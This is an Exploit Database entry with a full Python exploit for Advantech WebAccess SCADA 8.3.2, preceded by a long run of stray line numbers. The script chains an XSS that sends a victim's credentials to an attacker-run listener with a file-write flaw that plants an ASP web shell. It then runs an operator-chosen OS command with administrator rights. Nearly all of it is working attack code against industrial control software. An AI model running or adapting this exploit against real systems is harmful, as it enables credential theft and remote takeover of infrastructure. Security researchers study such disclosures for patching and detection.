Advantech WebAccess SCADA 8.3.2 – Remote Code Execution

Exploit Database
128 阅读

作者： Chris Lyne

日期： 2018-11-05
类别：
- webapps
平台：
- asp
来源：https://www.exploit-db.com/exploits/45774/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

# Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution

# Date: 2018-11-02

# Exploit Author: Chris Lyne (@lynerc)

# Vendor Homepage: http://www.advantech.com

# Device: NRVMini2

# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-1MDG1BH

# Version: 8.3.2

# Tested on: Windows Server 2008 R2

# CVE: CVE-2018-15705, CVE-2018-15707

# TRA: https://www.tenable.com/security/research/tra-2018-35

# Description:

# This code exploits two vulnerabilities to gain remote code execution

# with Administrator privileges:

# 1) CVE-2018-15707 to steal credentials (XSS). User-interaction required.

# 2) CVE-2018-15705 to write an ASP file to the server.

from http.server import HTTPServer, BaseHTTPRequestHandler

from base64 import decodestring

import re

import requests, urllib, json

import sys

import argparse

TIMEOUT = 5 # sec

def err_and_exit(msg):

print '\n\nERROR: ' + msg + '\n\n'

sys.exit(1)

# WADashboard client

class WsClient:

def __init__(self, ip, port, https=False):

self.ip = ip

self.port = port

self.https = https

self.endpoint = 'https' if https else 'http'

self.endpoint += '://' + ip + ':' + str(port)

self.endpoint += '/WADashboard'

# see if service is up

def grab_projects(self):

url = self.endpoint + '/api/dashboard/v6/waConfig/getWebAccessProjectList'

r = requests.get(url, timeout=TIMEOUT)

if "resString" in r.text:

json_decoded = json.loads(r.text)

if json_decoded['resString'] is not None and len(json_decoded['resString']) > 0:

return json_decoded['resString']

return None

# success if we get cookies

def login(self, projectName, user, pw):

# issue a login request and set the cookies

# POST /WADashboard/login?cont=dashboardViewer

# projectName1=myproject&username=admin&password=hello&recId=

url = self.endpoint + '/login?cont=dashboardViewer'

data = {

'projectName1': projectName,

'username': user,

'password': pw,

'recId' : ''

}

r = requests.post(url, data, timeout=TIMEOUT)

if len(r.cookies) > 0:

self.cookies = r.cookies

return True # success

else:

return False# fail

def write_file(self, filename, contents):

# /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=contents&overwrite=true

# post the writeFile request

# for some reason, the data is required in the query string instead of POST data

url = self.endpoint + '/api/dashboard/v1/files/writeFile'

data = {

'projectSpecies': victim['project'] + '!savedConfiguration',

'folderpath': '../../../../' + filename,# uploads to /Broadweb/ folder

'msg' : contents,

'overwrite' : 'true'

}

url += '?' + urllib.urlencode(data)

r = requests.post(url, cookies=self.cookies, timeout=TIMEOUT)

return (r.status_code == 200)

# This class will serve as an HTTP listener

class MyWebHandler(BaseHTTPRequestHandler):

def do_GET(self):

data = self.path.replace('/', '') # remove leading slash

decoded = decodestring(data)

print "\n***LINK CLICKED!***"

try:

# carve out the piece we want to match

i = decoded.index('logOnWebService')

k = decoded.index('readNodeStatus')

chunk = decoded[i:k]

# find our match

regex = '^logOnWebService\$"(.+)", "(.*)"\$;.*'

m = re.match(regex, chunk)

if not m:

err_and_exit("Couldn't extract credentials...")

print "\nCredentials stolen..."

user = m.group(1)

pw = m.group(2)

print "- User: " + user

print "- Pass: " + pw

# login to WADashboard

if not client.login(victim['project'], user, pw):

err_and_exit("Credentials didn't work...")

print '\nLogged into WADashboard with credentials.'

# write malicious ASP file

asp_payload = '<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Done."%>'

filename = 'exec.asp'

if not client.write_file(filename, asp_payload):

err_and_exit("Write file failed...")

print "\n'" + filename + "' written to disk."

# execute OS command

url = broadweb_root + '/' + filename

data = {

'p' : victim['project'],

'n' : victim['node'],

'c' : victim['cmd']

}

url += '?' + urllib.urlencode(data)

r = requests.get(url, timeout=TIMEOUT) # no cookie needed

if r.status_code == 200:

print "\nSuccessful request to '" + url + "'\n"

else:

print "\nThere may be something wrong with the ASP payload.\n"

print "\nDone!"

except Exception as e:

print "Exception encountered: " + str(e)

msg = 'hello poppet'

self.send_response(200)

self.end_headers()

self.wfile.write(str.encode(msg))

# MAIN

# deal with command line flags

desc = '''This exploit targets Advantech WebAccess/SCADA 8.3.2. It has been tested against Windows 2008 R2 x64.

The goal of the script is to execute code remotely. User interaction is required.

The following operations will be conducted:

1) Ensure WebAccess application is running. (TCP port 80 by default)

2) Ensure WADashboard is running. (TCP port 8081 by default)

3) Ensure user-specified project exists.

4) Ensure user-specified node exists.

5) Generate malicious link to send to victim user. (exploits CVE-2018-15707 to steal credentials via XSS)

6) Start HTTP listener to receive credentials when victim clicks the link.

7) Login to WADashboard.

8) Write a malicious ASP file to the root of the WebAccess application. (exploits CVE-2018-15705)

Note: elevated privileges will be obtained using the Webdraw RemoteWinExec function.

9) Execute user-specified command.

Example (equivalent) commands:

python script.py -t 192.168.0.2 -p1 80 -p2 8081 -https false -proj myproject -node mynode -ip 192.168.0.3 -port 9999 -cmd calc.exe

python script.py -t 192.168.0.2 -proj myproject -node mynode -ip 192.168.0.3 -cmd calc.exe

'''

arg_parser = argparse.ArgumentParser(description=desc)

arg_parser.add_argument('-t', required=True, help='Target IP (Required)')

arg_parser.add_argument('-p1', type=int, default=80, help='WebAccess Port (Default: 80)')

arg_parser.add_argument('-p2', type=int, default=8081, help='WADashboard Port (Default: 8081)')

arg_parser.add_argument('-https', type=bool, default=False, help='HTTPS (Default: false)')

arg_parser.add_argument('-proj', required=True, help='Project name')

arg_parser.add_argument('-node', required=True, help='Node name')

arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')

arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')

arg_parser.add_argument('-cmd', required=True, help='OS command to be executed')

args = arg_parser.parse_args()

# victim settings

victim = dict()

victim['ip'] = args.t

victim['web_port'] = args.p1 # Broadweb web app port

victim['ws_port'] = args.p2# WADashboard Node.js service port

victim['https'] = args.https

victim['project'] = args.proj

victim['node'] = args.node

victim['cmd'] = args.cmd

# listener settings

listener = dict()

listener['ip'] = args.ip

listener['port'] = args.port

# validate IP addresses

ip_pattern = "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+"

for ip in [victim['ip'], listener['ip']]:

match = re.match(ip_pattern, ip)

if match is None:

print "\nError: IP Address is invalid: '" + ip + "'.\n"

arg_parser.print_help()

sys.exit(1)

# start the real work

# ensure WebAccess ASP application is running

print "\nPerforming some banner checks to ensure services are running...\n"

proto = 'https' if victim['https'] else 'http'

broadweb_root = proto + '://' + victim['ip']

# no need to add port if it's 80 or 443

https = victim['https']

if (https and victim['web_port'] != 443) or (victim['web_port'] != 80 and not https):

broadweb_root += ':' + str(victim['web_port'])

broadweb_root += '/broadWeb'

url = broadweb_root + '/bwRoot.asp'

try:

r = requests.get(url, timeout=TIMEOUT)

except requests.exceptions.ConnectionError as e:

err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['web_port']))

if 'Welcome to Advantech WebAccess' not in r.text:

err_and_exit('WebAccess not found.')

print 'WebAccess is up.'

# ensure WADashboard Node.js service is running

# and projects are defined

client = WsClient(victim['ip'], victim['ws_port'], https=https)

try:

projects = client.grab_projects()

except requests.exceptions.ConnectionError as e:

err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['ws_port']))

if not projects:

err_and_exit('Dashboard Viewer not found.')

print "Dashboard Viewer is up."

if len(projects) == 0:

err_and_exit("No projects found...")

print "\nFound projects: "

for project in projects:

print " - " + project

# ensure specified project exists

if victim['project'] not in projects:

err_and_exit("Specified project, " + victim['project'] + " was not found...")

print "Specified project '" + victim['project'] + "' exists."

# ensure nodes are defined for project

# we have to specify a node name to run the custom RemoteWinExec() function

url = broadweb_root + '/' + victim['project']+'.dpj'

r = requests.get(url, timeout=TIMEOUT)

node_list = list()

if "[nodelist]" in r.text:

for line in r.text.split('\n'):

regex = "^node[0-9]=(.*)$"

m = re.match(regex, line, flags=re.MULTILINE)

if m:

node_list.append(m.group(1).strip())

if len(node_list) == 0:

err_and_exit("No nodes found...")

print "\nFound nodes: "

for node in node_list:

print ' - ' + node

if victim['node'] not in node_list:

err_and_exit("Node, " + victim['node'] + " not in node list...")

print "Specified node '" + victim['node'] + "' exists."

# generate link to send to victim

print "\nSend this link to the victim:"

print "Keep in mind, they could be logged in via localhost."

link = broadweb_root + '/bwmainleft.asp?pid=1&pname=");i=document.createElement(\'img\');'

link += 'i.src="http://' + listener['ip'] + ':' + str(listener['port']) + '/'

link += '"%2bbtoa(document.getElementsByTagName(\'script\')[4].text);//'

print link

# start listener

print "\nListening on " + listener['ip'] + ":" + str(listener['port'])

print "Waiting for victim to click link..."

httpd = HTTPServer((listener['ip'], listener['port']), MyWebHandler)

httpd.handle_request()